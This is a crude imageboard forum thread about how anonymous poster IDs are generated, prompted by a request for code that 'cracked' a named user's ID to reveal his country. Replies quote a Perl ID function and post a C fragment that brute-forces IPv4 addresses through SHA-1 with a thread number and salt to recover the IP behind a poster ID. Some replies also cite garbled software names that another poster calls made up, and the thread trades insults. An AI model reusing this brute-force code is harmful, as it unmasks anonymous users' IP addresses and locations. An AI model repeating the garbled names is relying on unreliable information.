Imageboard poster IDs

I've noticed that /soc/ now has forced anon and IDs.
I assume they're generated from the poster's IP and the thread id, but what's the ENTERPRISE GOLD STANDARD for generating IDs on textboards? Something involving a crypt function, I imagine.
I also recall there being some threads here about someone cracking FV's user id to reveal that he's from Israel; if someone could point me to those threads and the code the cracker used, I'd be grateful.

the id mechanism is as old as the kotsaba image boards
vrobatsa imageboard source is open
why dont ya look into it


instead of shitpostin'

>>3
My question might be easy to answer, but I think it hardly qualifies as a ``shitpost.''
In any case; thank you for >>2.

kotsaba
vrobatsa

jesus fucking christ, what is this made up shit

sub make_id_code($$$)
{
    my ($ip,$time,$link)=@_;

    return EMAIL_ID if($link and DISPLAY_ID=~/link/i);
    return EMAIL_ID if($link=~/sage/i and DISPLAY_ID=~/sage/i);

    return resolve_host($ENV{REMOTE_ADDR}) if(DISPLAY_ID=~/host/i);
    return $ENV{REMOTE_ADDR} if(DISPLAY_ID=~/ip/i);

    my $string="";
    $string.=",".int($time/86400) if(DISPLAY_ID=~/day/i);
    $string.=",".$ENV{SCRIPT_NAME} if(DISPLAY_ID=~/board/i);

    return mask_ip($ENV{REMOTE_ADDR},make_key("mask",SECRET,32).$string) if(DISPLAY_ID=~/mask/i);

    return hide_data($ip.$string,6,"id",SECRET,1);
}

>>6
i thought it was written in php

>>5
your mother

// IP blocks
        for (a = 26; a < sizeof(ablocks); ++a) {
            SHA_CTX ctx;
            char prefix[16] = { '\0' };
            unsigned char md[SHA_DIGEST_LENGTH] = { '\0' };
            unsigned int b, c, d;
            char* bpos;
            char* cpos;
            char* dpos;
            bpos = prefix + sprintf(prefix, "%u.", ablocks[a]);
            for (b = 0; b < 256; ++b) {
                cpos = bpos + sprintf(bpos, "%u.", b);
                for (c = 0; c < 256; ++c) {
                    dpos = cpos + sprintf(cpos, "%u.", c);
                    for (d = 0; d < 256; ++d) {
                        sprintf(dpos, "%u", d);
                        SHA1_Init(&ctx);
                        SHA1_Update(&ctx, prefix, strlen(prefix));
// this might be reply # + thread #
                        SHA1_Update(&ctx, "291177427627", 12);
// from salt.cgi
                        SHA1_Update(&ctx, salt, 448);
                        SHA1_Final(md, &ctx);
// search is derived from the ID somehow, I cannot remember how an example here:
//  _+sP   42Ns   t___ (ID being +sP42Nst)
//5feb0f e3636c b575d7
                        if (memcmp(search, md + 1, 5) == 0) {
                            char* base64 = NULL;
                            base64_encode(md, SHA_DIGEST_LENGTH, &base64);
                            base64[9] = '\0';
                            printf("%u.%u.%u.%u: %s\n", ablocks[a], b, c, d, base64 + 1);
                            free(base64);
                            exit(0);
                        }
                    }
                }
            }
        }

5feb0f e3636c b575d7
Also you want six bytes from there.

>>9
An imageboard in C?

>>11
No, that's just a method for brute-forcing IDs.  (I don't think it works any more.)

>>12
I bruteforced you're waifu